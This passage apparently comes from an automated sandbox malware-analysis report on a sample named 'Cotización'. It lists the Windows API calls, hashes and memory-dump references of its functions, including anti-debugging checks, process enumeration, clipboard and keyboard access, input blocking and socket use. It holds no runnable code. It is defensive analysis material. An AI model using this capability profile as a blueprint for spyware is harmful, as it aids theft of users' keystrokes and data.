                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ErrorLast$closesocket$bindlistensocket
                • String ID:
                • API String ID: 540024437-0
                • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                • API String ID: 0-2872873767
                • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                APIs
                • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                • __wsplitpath.LIBCMT ref: 00475644
                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                • _wcscat.LIBCMT ref: 00475657
                • __wcsicoll.LIBCMT ref: 0047567B
                • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                • CloseHandle.KERNEL32(00000000), ref: 004756BA
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                • String ID:
                • API String ID: 2547909840-0
                • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                • Sleep.KERNEL32(0000000A), ref: 0045250B
                • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                • FindClose.KERNEL32(?), ref: 004525FF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                • String ID: *.*$\VH
                • API String ID: 2786137511-2657498754
                • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                APIs
                • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                • TerminateProcess.KERNEL32(00000000), ref: 00422004
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID: pqI
                • API String ID: 2579439406-2459173057
                • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                APIs
                • __wcsicoll.LIBCMT ref: 00433349
                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                • __wcsicoll.LIBCMT ref: 00433375
                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __wcsicollmouse_event
                • String ID: DOWN
                • API String ID: 1033544147-711622031
                • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                APIs
                • GetKeyboardState.USER32(?), ref: 0044C3D2
                • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: KeyboardMessagePostState$InputSend
                • String ID:
                • API String ID: 3031425849-0
                • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                APIs
                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ErrorLastinet_addrsocket
                • String ID:
                • API String ID: 4170576061-0
                • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                APIs
                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                • IsWindowVisible.USER32 ref: 0047A368
                • IsWindowEnabled.USER32 ref: 0047A378
                • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                • IsIconic.USER32 ref: 0047A393
                • IsZoomed.USER32 ref: 0047A3A1
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                • String ID:
                • API String ID: 292994002-0
                • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                APIs
                • OpenClipboard.USER32(?), ref: 0046DCE7
                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                • CloseClipboard.USER32 ref: 0046DD0D
                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                • CloseClipboard.USER32 ref: 0046DD41
                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                • CloseClipboard.USER32 ref: 0046DD99
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                • String ID:
                • API String ID: 15083398-0
                • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove
                • String ID: U$\
                • API String ID: 4104443479-100911408
                • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                APIs
                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Find$File$CloseFirstNext
                • String ID:
                • API String ID: 3541575487-0
                • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                APIs
                • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                • FindClose.KERNEL32(00000000), ref: 004339EB
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: FileFind$AttributesCloseFirst
                • String ID:
                • API String ID: 48322524-0
                • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                APIs
                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                • String ID:
                • API String ID: 901099227-0
                • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                APIs
                • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Proc
                • String ID:
                • API String ID: 2346855178-0
                • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                APIs
                • BlockInput.USER32(00000001), ref: 0045A38B
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: BlockInput
                • String ID:
                • API String ID: 3456056419-0
                • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                APIs
                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: LogonUser
                • String ID:
                • API String ID: 1244722697-0
                • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                APIs
                • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                Memory Dump Source
